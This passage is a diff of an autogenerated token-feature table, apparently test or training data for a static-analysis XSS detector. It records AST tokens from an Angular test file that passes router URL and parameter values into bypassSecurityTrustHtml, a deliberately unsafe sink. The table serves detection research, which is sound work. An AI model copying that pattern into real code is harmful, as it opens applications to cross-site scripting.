bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:86 | this.ro ... Map.get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:86 | this.ro ... Map.get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | exceptional return of this.ro ... et('x') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | exceptional return of this.ro ... et('x') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | exceptional return of this.ro ... et('x') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | exceptional return of this.ro ... et('x') | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | exceptional return of this.ro ... et('x') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12041,6 +91599,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:91 | this.ro ... et('x') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:49:35:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:49:35:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:49:35:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:49:35:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:49:35:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:55:35:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:55:35:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:55:35:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:55:35:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:55:35:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:64:35:66 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:64:35:66 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:64:35:66 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:64:35:66 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:64:35:66 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:68:35:68 | 1 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:68:35:68 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:68:35:68 | 1 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:68:35:68 | 1 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:68:35:68 | 1 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:71:35:82 | parameterMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:71:35:82 | parameterMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:71:35:82 | parameterMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:71:35:82 | parameterMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:71:35:82 | parameterMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:84:35:86 | get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:84:35:86 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:84:35:86 | get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:84:35:86 | get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:84:35:86 | get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | CalleeFlexibleAccessPath | this.route.snapshot.url.1.parameterMap.get | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12048,6 +91636,76 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:35:88:35:90 | 'x' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | exceptional return of this.sa ... rams.x) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | exceptional return of this.sa ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | exceptional return of this.sa ... rams.x) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | exceptional return of this.sa ... rams.x) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | exceptional return of this.sa ... rams.x) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | this.sa ... rams.x) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | this.sa ... rams.x) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | this.sa ... rams.x) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | this.sa ... rams.x) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:5:36:92 | this.sa ... rams.x) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:10:36:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:10:36:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:10:36:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:10:36:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:10:36:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:20:36:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:20:36:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:20:36:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:20:36:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:20:36:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:66 | this.ro ... hot.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:66 | this.ro ... hot.url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:36:44:36:66 | this.ro ... hot.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route 